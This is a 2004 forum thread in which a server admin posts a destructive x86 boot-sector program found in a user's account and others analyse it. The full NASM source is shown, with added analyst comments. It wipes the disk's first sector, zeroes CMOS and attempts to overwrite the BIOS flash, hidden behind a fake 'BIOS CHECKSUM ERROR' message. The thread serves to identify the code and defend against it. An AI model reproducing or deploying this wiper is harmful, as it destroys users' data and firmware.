Old 11-03-2004, 01:55 PM   #1
Paul6253
LQ Newbie
 
Registered: Sep 2003
Posts: 7

Rep: Reputation: 0
possible BIOS attack tool???


I recently found this code on my server... I am posting it here because
I want to clarify what I think it does and whether it would indeed do it.
For now the user's account has been frozen - I don't
like this code--

What I have asserted so far:
1- it's a boot sector
2- it writes random stuff to IDE0
3- it *tries* to write to ROM-- possibly nuke the BIOS?!!!?

Thanks for any input...

Code:
; Analyst note: hand-written 16-bit real-mode boot sector in NASM syntax.
; The BIOS loads a boot sector at linear 7C00h; the far jump below sets
; CS to 07C0h so that the `org 0` offsets used throughout resolve correctly.
BITS 16
org 0
EntryPoint:

    jmp 0x07C0:AfterData             ; far jump: CS := 07C0h, IP := AfterData


		; BIOS PARAMETER BLOCK
		; Makes the sector look like a FAT12 boot record. None of these
		; fields are referenced by the code in this file; they exist only so
		; the sector passes as an ordinary bootable volume.
		oemID				db "DIE-OS", 0, 0		; 8 bytes
		bytSPerSector		dw 0200h
		sectorsPerCluster	db 01h
		nrReservedSectors	dw 0001h				; bootloader is spanning 1 sectors
		nrFats				db 02h
		nrRootDirs			dw 00E0h
		totalSectorsSmall	dw 0B40h
		mDIaID				db 0F0h
		sectorsPerFat		dw 0009h
		sectorsPerTrack		dw 0012h
		headsPerCylinder	dw 0002h
		hiddenSectors		dd 00000000h
		totalSectorsLarge	dd 00000000h
		driveNr				db 00h
		;OPTIONAL FIELDS, NOT NEEDED ON
		;FAT12, SKIPPED TO SAVE SIZE.
		flags				db 00h
		signature			db 29h
		volumeID			dd 0FFFFFFFFh
		volumeLabel			db "XXXXXXXXX"
		systemID			db "FAT12   "

		;my data
		; Zero-terminated text shown by Print before the destructive
		; routines run (10,13 = LF,CR). The wording imitates a firmware
		; error so the damage that follows looks like a hardware fault.
		 BOOT_MSG db 'BIOS CHECKSUM ERROR',10,13,0
                 BLAH     dw 0                   ; not referenced anywhere in this file

AfterData:
; Analyst note: main flow of the payload. Visible order of operations:
;   Print(BOOT_MSG) -> Play (speaker tone) -> kill_hdd -> kill_BIOS.
; kill_BIOS is entered with jmp, not call, and ends in a reset jump, so
; control never comes back here.
; update DS to be 7C0 instead of 0
push CS
pop DS

; update ES also
push CS
pop ES

; create stack
mov ax, 0x0000
mov ss, ax                    ; SS := 0000h
mov sp, 0xFFFF                ; stack grows down from 0000:FFFF


; display boot message...
lea si, [BOOT_MSG]            ; si -> zero-terminated string for Print
call Print
call Play                     ; PIT/PC-speaker I/O, see Play
call kill_hdd                 ; I/O to the primary IDE/ATA port range (1F0h-1F7h)
jmp kill_BIOS                 ; CMOS/BIOS-flash wiper; does not return

;************************************************************
; Procedure print
; prints a zero terminated string pointed to by si
; Uses BIOS INT 10h teletype output (AH=0Eh), one byte per call.
; In:    ds:si = zero-terminated string
; Out:   nothing; ax is preserved via push/pop
; Clobb: si (left past the terminator), DF (cleared), flags
;************************************************************
Print:
push ax
mov ah, 14 ; BIOS code for screen display
cld        ; lodsb must advance si upward
print_loop:
lodsb ; moving the character to be displayed to al
or al, al ; checking if the char is NULL
jz printdone
int 10h ; Calling BIOS routine
JMP print_loop

printdone:
pop ax
ret
; End of print procedure...




; Procedure Play
; Sounds a tone on the PC speaker: gates the speaker via port 61h,
; programs PIT channel 2 (mode byte via 43h, divisor via 42h).
; The divisor is computed as dx:ax / di = 0014:4F38h / 0666h; the
; quotient lands in ax and is written low byte first, then high byte.
; Clobb: ax, dx, di, flags
Play:
mov di,0666h
in  al,061h
or al,3                       ; enable speaker gate + timer 2 gate
out 061h,al
mov al,0b6h                   ; PIT channel 2, lobyte/hibyte, square wave
out 043h,al
mov dx,014h
mov ax,04f38h
div di                        ; ax := quotient, dx := remainder
out  042h,al
mov al,ah
out 042h,al
ret
; Procedure kill_hdd
; Analyst note: programs the primary IDE/ATA task-file registers
; (ports 1F2h..1F7h) for a single-sector write and then streams words
; from ds:0C000h to the data port 1F0h with `rep outsw`. As the thread
; observes, the effect is to overwrite the drive's first sector (boot
; sector/MBR) with whatever memory holds at that address. No status
; polling or error checking is done.
; Clobb: ax, cx, dx, si, flags
kill_hdd:
        mov	dx, 1F2h
	mov	al,1
	out	dx,al
	inc	dx
	out	dx,al
	inc	dx
	xor	ax,ax
	out	dx,al
	inc	dx
	out	dx,al
	mov	al, 10100000b
	inc	dx
	out	dx,al
	inc	dx
	mov	al,30h
	out	dx,al                    ; command register (1F7h)
	lea	si, [0c000h]             ; source of the data streamed to the drive
	mov	dx, 1F0h                 ; ATA data port
	mov	cx, 513
	rep	outsw
	RET
kill_BIOS:
; Analyst note: destructive routine, entered by jmp, never returns.
; Three phases are visible:
;  1. Nuke_CMOS_Byte: with interrupts off, loops CL from 127 down to 0
;     writing zero to every CMOS RAM byte via ports 70h/71h. This wipes
;     the firmware settings and the stored checksum.
;  2. Nuke_BIOS: read-modify-writes chipset PCI configuration registers
;     through IOForEEPROM (ports 0CF8h/0CFxh) and then writes unlock /
;     command bytes into the E000h and F000h segments where the system
;     ROM is mapped. NOTE(review): the constants, labels and comments
;     here closely resemble the published BIOS-flash code of the CIH
;     (Chernobyl) virus, apparently transcribed from 32-bit to 16-bit.
;     It can only affect a flash part that the chipset maps writable
;     and that is not hardware write-protected; defenders should rely
;     on firmware/boot-block write protection rather than on this code
;     failing.
;  3. Forces a cold reboot by clearing the BIOS reset flag at
;     0040h:0072h and jumping to the reset vector FFFFh:0000h.
; Detection hint: a boot sector combining a 70h/71h write loop,
; 0CF8h/0CFCh accesses and stores into E000h-F000h has no legitimate
; reason to exist.


                CLI   ; dont interrupt me 

		MOV	CL, 128			         ;map cmos

Nuke_CMOS_Byte: DEC	CL			; done?
		JS	Nuke_BIOS                       ; CL wrapped to -1: all 128 bytes done

		MOV	AL, CL			; Request I/O to byte CL.
		OUT	70h, AL                 ; CMOS index port

		XOR	AL, AL			; clear and write
		OUT	71h, AL                 ; CMOS data port

		JMP	Nuke_CMOS_Byte		; Repeat until all is done.



Nuke_BIOS:	; Show BIOS Page in 000E0000 - 000EFFFF (64k).

		MOV	EDI, 8000384Ch          ; PCI config address (bit 31 = enable)
		MOV	BP, 0CF8h               ; CONFIG_ADDRESS port
		MOV	DX, 0CFEh               ; CONFIG_DATA port + 2
		CALL	IOForEEPROM

		; Show BIOS Page in 000F0000 - 000FFFFF (64k).

		MOV	DI, 0058h
		DEC	DX
		CALL	IOForEEPROM

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   (   512 Bytes   ) *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Writted...       *
; ***********************



		push 0e555h
		pop ds                          ; ds:si -> E5555h
		mov si,5
		


		push 0e2aah
		pop es                          ; es:0Ah -> E2AAAh
		
		

		MOV     byte  [ds:si], 0aah
		MOV	byte  [es:0ah], 055h

		MOV	BYTE  [ds:si],80h
		MOV	byte  [ds:si],CL
		MOV	byte  [es:0ah], AL


		MOV	BYTE  [ds:si], 60h

                mov ecx,0e2aaah
		LOOP	$                            ;very tiny delay
                 
                mov ecx,0e2aaah 		;restore ecx
		                                          ;cant use push\pop cuz 
						           ;were using 2byte  stacks
	; Kill off BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).

		XOR	AH, AH
		MOV	WORD  [ds:si], 'RI'    

		XCHG	CX, AX                  ; cx := former ax (loop count), ax := former cx

		LOOP	$

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   (   128 KB   )    *
; * can be Writted...   *
; ***********************


		push 0f555h
		pop ds                          ; ds:si -> F5555h
		mov si,5
                mov ecx,0e2aaah 
		MOV	CH, 0AAh

                ; Enable EEPROM to Write.

		MOV	[ds:si], CL
		MOV	byte [ECX], AL

		MOV	BYTE  [ds:si], 80h
		MOV	byte  [ds:si], CL
		MOV	byte  [ECX], AL

		MOV	BYTE  [ds:si], 20h
		LOOP	$

	; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).

		xor al,al
                push 0fe00h
		pop ds                          ; ds:si -> FE000h
		mov si,0
		mov [ds:si],al

		CALL	IOForEEPROM

                ; store magic value at 0040h:0072h to reboot:
                ;		0000h - cold boot.
                ;		1234h - warm boot.

	MOV  AX,0040h
	MOV  DS,AX
	MOV  word[0072h],0000h   ; cold boot.
	JMP  0FFFFh:0000h	 ; reboot!




; I/O for EEPROM.
; Helper for Nuke_BIOS: a read-modify-write of one chipset register
; through the PCI configuration ports. The caller sets up two
; port/value pairs (DI/AX and DX/BP); each XCHG pair below swaps them so
; the same OUT/IN instructions alternately hit the address port and the
; data port. The register value read back is ORed with 44h and written
; again. No inputs are validated.
; In:    di (register address), bp and dx (the two ports), ax (scratch)
; Clobb: ax, dx, di, bp, flags
IOForEEPROM:
		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AX                  ; select the register

		XCHG	DI, AX
		XCHG	DX, BP
		IN	AL, DX                  ; read current value

		OR	AL, 44h                 ; set the two enable bits



		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AX                  ; re-select the register

		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AL                  ; write the modified value back

		RET




; Make the file 512 bytes long
; Pads with zeros up to offset 510 so the signature lands in the last
; two bytes of the sector.
TIMES 510-($-$$) DB 0

; Add the boot signature
; 55h AAh in bytes 510/511 marks the sector as bootable to the BIOS.
dw 0AA55h
 
Old 11-03-2004, 02:03 PM   #2
Xolo
Member
 
Registered: Jul 2004
Location: The Netherlands
Distribution: Mandrake, Knoppix, Coyote Linux, RedHat
Posts: 354
Blog Entries: 3

Rep: Reputation: 31
Somehow it doesn't look finished to me.
But reading through the code, it does look like there are procedures to write to 128 KB portions of the BIOS flash ROM, including cold-boot/warm-boot handling and a reboot routine, and a hard-disk write routine.
Whether or not it is for malicious intent depends on the user's history, I think?

Last edited by Xolo; 11-03-2004 at 02:05 PM.
 
Old 11-03-2004, 02:10 PM   #3
m00t00
Member
 
Registered: Sep 2004
Distribution: Slackware 10, Gentoo
Posts: 292

Rep: Reputation: 30
Well, routines named kill_bios and kill_hdd don't make me feel very fuzzy. And the comments too, like "destroy bios."

It looks like it tries to kill the hard drive, the bytes in the CMOS, and the BIOS.
 
Old 11-03-2004, 07:55 PM   #4
bignerd
Member
 
Registered: Nov 2004
Distribution: FC1, Gentoo, Mdk 8.1, RH7-8-9, Knoppix, Zuarus rom 3.13
Posts: 98

Rep: Reputation: 15
I've written simple assembly code on x86 machines back in the 90's to read and write to the PC BIOS before. This indeed is designed, once assembled, to write to the BIOS. Never a good idea unless you know exactly what you are doing. Without going into details, this code will display a message (BIOS CHECKSUM ERROR) directly into video memory, i.e. the screen, and then write 0's over the entire CMOS area. Usually that's bad. :-)

This does not appear to be friendly code.

The kill_hdd section is classic assembly code for deleting the boot sector of a hard drive. Practically straight from a textbook.

I've not done any boot sector programs so I can't comment on that. But there is no viral code for spreading. Looks like something would need to write this to the boot sector of a drive (floppy, CD or hard drive), and the machine then booted from that device, before it would be dangerous. After the code is assembled, obviously.

-b

edit:

forgot to mention I suppose it could be on the boot sector of a usb flash drive too.

Last edited by bignerd; 11-03-2004 at 08:05 PM.
 
Old 11-04-2004, 02:34 PM   #5
Paul6253
LQ Newbie
 
Registered: Sep 2003
Posts: 7

Original Poster
Rep: Reputation: 0
Bignerd,
thanks for your reply... since you seemed most knowledgeable about this I sent you an email to expand on it.
thanks to the other responders as well
regards
 
Old 11-04-2004, 09:50 PM   #6
Matir
LQ Guru
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Debian, Arch
Posts: 8,507

Rep: Reputation: 128Reputation: 128
On a related note, I assume that something like this cannot be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
 
Old 11-05-2004, 12:15 AM   #7
bignerd
Member
 
Registered: Nov 2004
Distribution: FC1, Gentoo, Mdk 8.1, RH7-8-9, Knoppix, Zuarus rom 3.13
Posts: 98

Rep: Reputation: 15
Quote:
Originally posted by Paul6253
Bignerd,
thanks for your reply...since you seemed most knowledgable about this I sent you an email to expand upon.
thanks to the other responders as well
regards
got your email but my reply to you bounced.

Message from yahoo.com.
Unable to deliver message to the following address(es).

<v3ct0r99@hotmail.com>
 
Old 11-05-2004, 04:03 PM   #8
m00t00
Member
 
Registered: Sep 2004
Distribution: Slackware 10, Gentoo
Posts: 292

Rep: Reputation: 30
Quote:
Originally posted by Matir
On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
Correct. Because this is boot sector code, you need to have write access to the boot sector on a particular device. Usually the hard drive, unless you have physical access and can boot from a floppy (or hey, maybe even a CD/DVD).
 
Old 11-05-2004, 06:13 PM   #9
Matir
LQ Guru
 
Registered: Nov 2004
Location: San Jose, CA
Distribution: Debian, Arch
Posts: 8,507

Rep: Reputation: 128Reputation: 128
Hrrm, some kind of heuristic analysis tool for things like that might be useful.
 